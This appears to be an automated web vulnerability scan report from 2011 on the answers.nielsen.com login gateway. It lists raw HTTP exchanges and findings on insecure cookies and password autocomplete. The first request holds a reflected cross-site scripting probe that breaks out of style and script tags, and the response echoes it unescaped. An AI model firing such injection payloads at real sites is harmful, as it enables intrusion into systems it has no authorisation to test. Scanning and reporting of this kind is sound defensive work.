GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=3&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000766)%3C/script%3E HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Cookie: answers_cookie=R868046967; GATEWAYSESSION=3pQsN68Ds9pFQn2lswbFflkzpJJRQQp9ZnnRFD2l4TGSvLLHtG4T!-271814052; USER_EMAIL_REJECT=3 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT,session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Date: Fri, 29 Apr 2011 18:00:26 GMT Server: Apache Cache-Control: no-cache="set-cookie" X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 <html> <head> <title>Nielsen Answers</title> <style> body, td { /* SET FONT FOR ALL BROWSERS */ font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } body, tr, .ni-heading1, .ni-heading2, .ni-heading3, .ni-heading4, .ni-definition-list, .ni-ordered-list, .ni-unordered-list, .ni-unordered-list-no-pad, .ni-body-text, .ni-body-text-2, .ni-form-label, .ni-error-text, .ni-footer { text-align: left; color: #7E7E7E; line-height: 1.6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } img { border: none; } .ni-link img, .ni-link .ni-img { border: none; } .ni-link, .ni-link:link, .ni-link:visited { color: #545763; font-weight: bold; text-decoration: none; } .ni-link2, .ni-link2:link, .ni_link2:visited { color: #00A2ED; text-decoration: none; } .ni-active, .ni-active:link, .ni-active:visited { color: #02A2EC } .ni-link:hover, .ni-link2:hover, .ni-active:hover { color: #43BAF1; } .ni-error, .ni-information, .ni-helptext { padding: 9px 9px 0; margin-bottom: 9px; background: white; } .ni-error { border: 1px solid red; color: #c00; } .ni-error-text { color: #c00; margin: 0 0 9px; } .ni-information, .ni-helptext { border: 1px solid #D7D8DC; background-color: #EFF0F2; } .ni-unordered-list, .ni-unordered-list ul, .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { list-style-type: square; font-weight: bold; padding: 0; color: #666; margin: 0 0 9px 19px; } .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { margin: 0 0 0px 19px; } .ni-unordered-list ul { margin-bottom: 0; margin-left: 13px; } .ni-unordered-list li { padding: 0px;; } .ni-uordered-list-chevron, .ni-uordered-list-chevron ul { list-style-type: none; margin: 0 0 9px 5px; } .ni-uordered-list-chevron li { background: transparent url("/gateway/images/answers_ui/ni-chevron.gif") no-repeat left 4px; padding-left: 15px; } .ni-uordered-list-chevron ul { margin-left: 0; } .ni-ordered-list, .ni-ordered-list ol { padding-left: 5px; margin: 0 0 9px 19px; } .ni-ordered-list ol { margin-bottom: 0; } .ni-definition-list { margin: 0; } .ni-definition-list dt { font-weight: bold; margin: 0; } .ni-definition-list dd { font-weight: normal; margin: 0; } .ni-heading1 { font-weight: bold; font-size: 20px; display: block; margin: 0 0 9px; line-height: 1.1; } .ni-heading2 { font-size: 16px; font-weight: normal; display: block; margin: 0 0 9px; line-height: 1.3; } .ni-heading3 { font-size: 12px; font-weight: bold; color: #666; display: block; margin: 0; } .ni-heading4 { font-size: 11px; font-weight: bold; color: #000; display: block; margin: 0 0 9px; } .ni-body-text { margin: 0 0 9px; font-weight: normal; } .ni-body-text-2 { margin: 0; font-weight: normal; } .ni-strong { font-weight: bold; } .ni-emphasis { font-weight: normal; font-style: italic; } .ni-heading4 { } .ni-hr { height: 1px; margin: 1.2em 0; background: #333; color: #333; border: 0; clear: both; } .ni-hr-2 { height: 1px; margin: .5em 0; background: #333; color: #333; border: 0; clear: both; } .ni-border-top { border-top: solid 1px #333 } .ni-br { width: 100%; clear: both; } /* Form Elements ---------------------------------------------------------*/ .ni-form { margin: 0; } .ni-form-table { margin: 0; } .ni-form-required { color: #F68421; } .ni-form-label { font-size: 11px; text-align: right; vertical-align: top; } .ni-form-label-t-left { font-size: 11px; text-align: left; vertical-align: middle; } .ni-form-label-v-middle { font-size: 11px; text-align: right; vertical-align: middle; } .ni-form-label-spacer { width: 6px; } .ni-form-element { vertical-align: top; } .ni-form-text-input { border: 1px solid #BDBEC1; background-color: #f5f5f6; padding: 2px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } .ni-form-text-input:focus { background-color: #ceedfc; } .ni-form-select { border: 1px solid #BDBEC1; background-color: #f5f5f6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } .ni-form-checkbox { width: auto; } .ni-form-textarea { padding: 1px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; border: 1px solid #BDBEC1; background-color: #f5f5f6; color: #333; } .ni-form-textarea:focus { background-color: #ceedfc; } .ni-form-file { border: 1px solid #BDBEC1; font-size: 11px; font-family: Arial, Helvetica, sans-serif; } .ni-form-disabled { background-color: #dcdcdc; } /* SIMPLE BUTTONS --------------------------------------------------------*/ .ni-btn { display: inline; width: auto; } .ni-btn input { background: #41BAF2; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#73CCF6',EndColorStr='#02A3ED'); color: white; font-weight: bold; font-size: 11px; border: 1px solid #0071BF; padding-top: 1px; padding-bottom: 1px; } .ni-btn-disabled input { background: #B5E4FA; border: 1px solid #5CC3F3; color: white !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#CFEEFC',EndColorStr='#96DDF9'); } .ni-btn-dark input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } .ni-btn-green input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } /* Table Elements --------------------------------------------------------*/ .ni-chrome-head { width:100%; } .ni-table { border: 1px solid black !important; border-collapse: collapse; clear: both; } .ni-row-head, .ni-row-head th { vertical-align: bottom; padding: 2px 7px; border: 1px solid #000; border-right: 1px solid #bebec0; border-left: 1px solid #bebec0; background-color: #eee; font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; } .ni-row-head-link, .ni-row-head-link:link, .ni-row-head-link:visited { font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; text-decoration: none; } .ni-row-head-link:hover { color: #43BAF1; } .ni-row-even, .ni-row-even td { background-color: #eee; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-row-odd, .ni-row-odd td { background-color: #fff; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-table-cell { vertical-align: middle; padding: 2px 7px; border: 1px solid #bebec0; color: #000; text-align: center; } table .ni-table-cell-left { text-align: left; } table .ni-table-cell-right { text-align: right; } table .ni-table-cell-center { text-align: center; } .ni-table .ni-link { font-weight: bold; color: #545763; } .ni-table .ni-user { font-weight: normal; } /* standard colored buttons ----------------------------------------------*/ .ni-btn-link, .ni-btn-link-active, .ni-btn-link-disabled { /*position: relative !important;*/ font: 11px arial, helvetica, sans-serif; font-weight: bold; text-decoration: none; line-height: 200%; *line-height: 100% !important; /*patch for ie6 problems*/ *vertical-align: 0px; *padding: 0; /*border: 1px solid green;*/ } /*active state*/ .ni-btn-link:active { background-position: 100% -75px; text-decoration: none; } .ni-btn-link-active { background-position: 100% -75px !important; } .ni-btn-link:active span { background-position: 100% -75px !important; text-decoration: none; } .ni-btn-link-active span { background-position: 100% -75px !important; } .ni-btn-link:active span span { background-position: 0 -75px !important; text-decoration: none; } .ni-btn-link-active span span { background-position: 0 -75px !important; } /*disabled state*/ .ni-btn-link-disabled { cursor:default !important; } .ni-btn-link-disabled { background-position: 100% -50px !important; } .ni-btn-link-disabled span { background-position: 100% -50px !important; } .ni-btn-link-disabled span span { background-position: 0 -50px !important; } /*hover state*/ .ni-btn-link:hover { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span span { background-position: 0 -25px; text-decoration: none; } /* light colored buttons ------------------------*/ .ni-btn-body-light { background: transparent url("/gateway/images/buttons/ni-btn-bg2.gif"); background-repeat: repeat-x; background-position: left top; padding: 3px 0px 5px 0px; height: 20px !important; display:inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-light { background-position: left -50px; } .ni-btn-left-light { background: transparent url("/gateway/images/buttons/ni-btn-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; cursor: hand; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-light { padding: 3px 0px 5px 5px; background-position: left -50px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-right-light { background: transparent url("/gateway/images/buttons/ni-btn-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; cursor: hand; *zoom: 1; /*hack for ie problems*/ *padding: 0px 5px 0px 0px !important; } .ni-btn-link-disabled .ni-btn-right-light { padding: 3px 5px 5px 0; background-position: right -50px; *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } /* dark colored buttons -------------------------*/ .ni-btn-body-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg2.gif") repeat-x left top; padding: 3px 0px 5px 0px; height: 20px !important; display: inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-dark { background-position: left -50px; } .ni-btn-left-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-dark { background-position: left -50px; } .ni-btn-right-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; *zoom: 1; /*hack for ie problems*/ *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } .ni-btn-link-disabled .ni-btn-right-dark { background-position: right -50px; } .ni-btn-left-cancel { background: url(/gateway/images/buttons/ni-btn-cancel-onblue.gif) no-repeat left top; padding: 3px 0px 5px 21px; *padding: 0px 0px 0px 21px !important; /*hack for ie problems*/ } /* These blocks are for displaying buttons -------------------------------*/ .white { padding: 20px 0; margin: 10px; background: #fff; border: 1px solid #999; overflow: hidden; } .blue { padding: 20px 0; margin: 10px; background: #A4DEF9; border: 1px solid #999; overflow: hidden; } /* Added new styles to display error messages in the Login page*/ .ni-logon-success-text { color: #009900 !important } .ni-logon-message-text { color: #0000ff !important } .ni-logon-body-text { color: #000000 !important } .ni-logon-error-text { color: #ff0000 !important } </style> <style> .ni-login-div{ height:101px; margin:70px 0px 0px 35px; *margin:70px 20px 0px auto; } </style> </head> <body> <table style="height:100%;width:100%;"> <tr> <td style="text-align:center;vertical-align:middle;"> <div style="width:380px;margin:auto;"> <table xmlns:fo="http://www.w3.org/1999/XSL/Format" border="0" cellspacing="0" cellpadding="0"><tr><td valign="center" style="padding-right:.5em;"><img src="/gateway/images/icons/icon_status_user_error_sm.gif" border="0" alt="" width="20" height="18"></td><td width="100%"><div class="ni-logon-error-text" style="font-weight:bold; margin: 5px 0px 5px;">Your account was not found.</div></td></tr></table> </div> <div style="border:1px solid #FFFFFF;height:189px;width:380px;margin:auto;background: transparent url('/gateway/images/answers_ui/bg_login.png') no-repeat left top;"> <form class="ni-form" action="/gateway/forms/login.fcc" method="post" name="login_form" AUTOCOMPLETE="ON" styleId="login_form"> <input type="hidden" name="realm" value="06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4"> <input type="hidden" name="target" value="'"-></style></script><script>netsparker(0x000766)</script>"> <input type="hidden" name="SMAUTHREASON" value="0"> <input type="hidden" name="password" value=" "> <table class="ni-form-table ni-login-div"> <tr></tr> <tr></tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Email:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:210px;" class="ni-form-text-input" id="logon" name="USER" type="text" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Password:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:100px;" class="ni-form-text-input" id="temp_password" name="PASSWORD" type="password" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label-spacer"> </td> <td> </td> <td style="text-align:right;"> <a href="#" class="ni-btn-link" onMousedown="this.className='ni-btn-link-active';return false;" onMouseout="this.className='ni-btn-link';return false;" onMouseup="this.className='ni-btn-link';return false;" onClick="document.forms.login_form.submit()" ><span class="ni-btn-right-light"><span class="ni-btn-left-light"><span class="ni-btn-body-light">Login</span></span></span></a><input type="submit" value="submit" style="position:absolute;..
Cookie Not Marked As Secure
Cookie Not Marked As Secure
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (
Man in the middle ) attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie ) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.
Actions to Take
See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure. ))
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to ) to a system between the victim and the web server.
answers_cookie
Request
GET /gateway/ HTTP/1.1 Referer: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 403 Forbidden Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT Date: Fri, 29 Apr 2011 17:59:31 GMT Server: Apache Content-Length: 1216 X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Keep-Alive: timeout=15, max=500 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"><HTML><HEAD><TITLE>Error 403--Forbidden</TITLE><META NAME="GENERATOR" CONTENT="WebLogic Server"></HEAD><BODY bgcolor="white"><FONT FACE=Helvetica><BR CLEAR=all><TABLE border=0 cellspacing=5><TR><TD><BR CLEAR=all><FONT FACE="Helvetica" COLOR="black" SIZE="3"><H2>Error 403--Forbidden</H2></FONT></TD></TR></TABLE><TABLE border=0 width=100% cellpadding=10><TR><TD VALIGN=top WIDTH=100% BGCOLOR=white><FONT FACE="Courier New"><FONT FACE="Helvetica" SIZE="3"><H3>From RFC 2068 <i>Hypertext Transfer Protocol -- HTTP/1.1</i>:</H3></FONT><FONT FACE="Helvetica" SIZE="3"><H4>10.4.4 403 Forbidden</H4></FONT><P><FONT FACE="Courier New">The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.</FONT></P></FONT></TD></TR></TABLE></BODY></HTML>
Auto Complete Enabled
Auto Complete Enabled
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.
Add the attribute autocomplete="off"
to the form tag or to individual "input" fields.
Actions to Take
See the remedy for the solution.
Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
PASSWORD
Request
GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT,GATEWAYSESSION=3pQsN68Ds9pFQn2lswbFflkzpJJRQQp9ZnnRFD2l4TGSvLLHtG4T!-271814052; path=/,session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Date: Fri, 29 Apr 2011 17:59:31 GMT Server: Apache Cache-Control: no-cache="set-cookie" X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Keep-Alive: timeout=15, max=500 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 <html> <head> <title>Nielsen Answers</title> <style> body, td { /* SET FONT FOR ALL BROWSERS */ font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } body, tr, .ni-heading1, .ni-heading2, .ni-heading3, .ni-heading4, .ni-definition-list, .ni-ordered-list, .ni-unordered-list, .ni-unordered-list-no-pad, .ni-body-text, .ni-body-text-2, .ni-form-label, .ni-error-text, .ni-footer { text-align: left; color: #7E7E7E; line-height: 1.6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } img { border: none; } .ni-link img, .ni-link .ni-img { border: none; } .ni-link, .ni-link:link, .ni-link:visited { color: #545763; font-weight: bold; text-decoration: none; } .ni-link2, .ni-link2:link, .ni_link2:visited { color: #00A2ED; text-decoration: none; } .ni-active, .ni-active:link, .ni-active:visited { color: #02A2EC } .ni-link:hover, .ni-link2:hover, .ni-active:hover { color: #43BAF1; } .ni-error, .ni-information, .ni-helptext { padding: 9px 9px 0; margin-bottom: 9px; background: white; } .ni-error { border: 1px solid red; color: #c00; } .ni-error-text { color: #c00; margin: 0 0 9px; } .ni-information, .ni-helptext { border: 1px solid #D7D8DC; background-color: #EFF0F2; } .ni-unordered-list, .ni-unordered-list ul, .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { list-style-type: square; font-weight: bold; padding: 0; color: #666; margin: 0 0 9px 19px; } .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { margin: 0 0 0px 19px; } .ni-unordered-list ul { margin-bottom: 0; margin-left: 13px; } .ni-unordered-list li { padding: 0px;; } .ni-uordered-list-chevron, .ni-uordered-list-chevron ul { list-style-type: none; margin: 0 0 9px 5px; } .ni-uordered-list-chevron li { background: transparent url("/gateway/images/answers_ui/ni-chevron.gif") no-repeat left 4px; padding-left: 15px; } .ni-uordered-list-chevron ul { margin-left: 0; } .ni-ordered-list, .ni-ordered-list ol { padding-left: 5px; margin: 0 0 9px 19px; } .ni-ordered-list ol { margin-bottom: 0; } .ni-definition-list { margin: 0; } .ni-definition-list dt { font-weight: bold; margin: 0; } .ni-definition-list dd { font-weight: normal; margin: 0; } .ni-heading1 { font-weight: bold; font-size: 20px; display: block; margin: 0 0 9px; line-height: 1.1; } .ni-heading2 { font-size: 16px; font-weight: normal; display: block; margin: 0 0 9px; line-height: 1.3; } .ni-heading3 { font-size: 12px; font-weight: bold; color: #666; display: block; margin: 0; } .ni-heading4 { font-size: 11px; font-weight: bold; color: #000; display: block; margin: 0 0 9px; } .ni-body-text { margin: 0 0 9px; font-weight: normal; } .ni-body-text-2 { margin: 0; font-weight: normal; } .ni-strong { font-weight: bold; } .ni-emphasis { font-weight: normal; font-style: italic; } .ni-heading4 { } .ni-hr { height: 1px; margin: 1.2em 0; background: #333; color: #333; border: 0; clear: both; } .ni-hr-2 { height: 1px; margin: .5em 0; background: #333; color: #333; border: 0; clear: both; } .ni-border-top { border-top: solid 1px #333 } .ni-br { width: 100%; clear: both; } /* Form Elements ---------------------------------------------------------*/ .ni-form { margin: 0; } .ni-form-table { margin: 0; } .ni-form-required { color: #F68421; } .ni-form-label { font-size: 11px; text-align: right; vertical-align: top; } .ni-form-label-t-left { font-size: 11px; text-align: left; vertical-align: middle; } .ni-form-label-v-middle { font-size: 11px; text-align: right; vertical-align: middle; } .ni-form-label-spacer { width: 6px; } .ni-form-element { vertical-align: top; } .ni-form-text-input { border: 1px solid #BDBEC1; background-color: #f5f5f6; padding: 2px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } .ni-form-text-input:focus { background-color: #ceedfc; } .ni-form-select { border: 1px solid #BDBEC1; background-color: #f5f5f6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } .ni-form-checkbox { width: auto; } .ni-form-textarea { padding: 1px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; border: 1px solid #BDBEC1; background-color: #f5f5f6; color: #333; } .ni-form-textarea:focus { background-color: #ceedfc; } .ni-form-file { border: 1px solid #BDBEC1; font-size: 11px; font-family: Arial, Helvetica, sans-serif; } .ni-form-disabled { background-color: #dcdcdc; } /* SIMPLE BUTTONS --------------------------------------------------------*/ .ni-btn { display: inline; width: auto; } .ni-btn input { background: #41BAF2; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#73CCF6',EndColorStr='#02A3ED'); color: white; font-weight: bold; font-size: 11px; border: 1px solid #0071BF; padding-top: 1px; padding-bottom: 1px; } .ni-btn-disabled input { background: #B5E4FA; border: 1px solid #5CC3F3; color: white !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#CFEEFC',EndColorStr='#96DDF9'); } .ni-btn-dark input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } .ni-btn-green input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } /* Table Elements --------------------------------------------------------*/ .ni-chrome-head { width:100%; } .ni-table { border: 1px solid black !important; border-collapse: collapse; clear: both; } .ni-row-head, .ni-row-head th { vertical-align: bottom; padding: 2px 7px; border: 1px solid #000; border-right: 1px solid #bebec0; border-left: 1px solid #bebec0; background-color: #eee; font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; } .ni-row-head-link, .ni-row-head-link:link, .ni-row-head-link:visited { font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; text-decoration: none; } .ni-row-head-link:hover { color: #43BAF1; } .ni-row-even, .ni-row-even td { background-color: #eee; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-row-odd, .ni-row-odd td { background-color: #fff; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-table-cell { vertical-align: middle; padding: 2px 7px; border: 1px solid #bebec0; color: #000; text-align: center; } table .ni-table-cell-left { text-align: left; } table .ni-table-cell-right { text-align: right; } table .ni-table-cell-center { text-align: center; } .ni-table .ni-link { font-weight: bold; color: #545763; } .ni-table .ni-user { font-weight: normal; } /* standard colored buttons ----------------------------------------------*/ .ni-btn-link, .ni-btn-link-active, .ni-btn-link-disabled { /*position: relative !important;*/ font: 11px arial, helvetica, sans-serif; font-weight: bold; text-decoration: none; line-height: 200%; *line-height: 100% !important; /*patch for ie6 problems*/ *vertical-align: 0px; *padding: 0; /*border: 1px solid green;*/ } /*active state*/ .ni-btn-link:active { background-position: 100% -75px; text-decoration: none; } .ni-btn-link-active { background-position: 100% -75px !important; } .ni-btn-link:active span { background-position: 100% -75px !important; text-decoration: none; } .ni-btn-link-active span { background-position: 100% -75px !important; } .ni-btn-link:active span span { background-position: 0 -75px !important; text-decoration: none; } .ni-btn-link-active span span { background-position: 0 -75px !important; } /*disabled state*/ .ni-btn-link-disabled { cursor:default !important; } .ni-btn-link-disabled { background-position: 100% -50px !important; } .ni-btn-link-disabled span { background-position: 100% -50px !important; } .ni-btn-link-disabled span span { background-position: 0 -50px !important; } /*hover state*/ .ni-btn-link:hover { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span span { background-position: 0 -25px; text-decoration: none; } /* light colored buttons ------------------------*/ .ni-btn-body-light { background: transparent url("/gateway/images/buttons/ni-btn-bg2.gif"); background-repeat: repeat-x; background-position: left top; padding: 3px 0px 5px 0px; height: 20px !important; display:inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-light { background-position: left -50px; } .ni-btn-left-light { background: transparent url("/gateway/images/buttons/ni-btn-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; cursor: hand; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-light { padding: 3px 0px 5px 5px; background-position: left -50px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-right-light { background: transparent url("/gateway/images/buttons/ni-btn-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; cursor: hand; *zoom: 1; /*hack for ie problems*/ *padding: 0px 5px 0px 0px !important; } .ni-btn-link-disabled .ni-btn-right-light { padding: 3px 5px 5px 0; background-position: right -50px; *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } /* dark colored buttons -------------------------*/ .ni-btn-body-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg2.gif") repeat-x left top; padding: 3px 0px 5px 0px; height: 20px !important; display: inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-dark { background-position: left -50px; } .ni-btn-left-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-dark { background-position: left -50px; } .ni-btn-right-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; *zoom: 1; /*hack for ie problems*/ *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } .ni-btn-link-disabled .ni-btn-right-dark { background-position: right -50px; } .ni-btn-left-cancel { background: url(/gateway/images/buttons/ni-btn-cancel-onblue.gif) no-repeat left top; padding: 3px 0px 5px 21px; *padding: 0px 0px 0px 21px !important; /*hack for ie problems*/ } /* These blocks are for displaying buttons -------------------------------*/ .white { padding: 20px 0; margin: 10px; background: #fff; border: 1px solid #999; overflow: hidden; } .blue { padding: 20px 0; margin: 10px; background: #A4DEF9; border: 1px solid #999; overflow: hidden; } /* Added new styles to display error messages in the Login page*/ .ni-logon-success-text { color: #009900 !important } .ni-logon-message-text { color: #0000ff !important } .ni-logon-body-text { color: #000000 !important } .ni-logon-error-text { color: #ff0000 !important } </style> <style> .ni-login-div{ height:101px; margin:70px 0px 0px 35px; *margin:70px 20px 0px auto; } </style> </head> <body> <table style="height:100%;width:100%;"> <tr> <td style="text-align:center;vertical-align:middle;"> <div style="width:380px;margin:auto;"> <table xmlns:fo="http://www.w3.org/1999/XSL/Format" 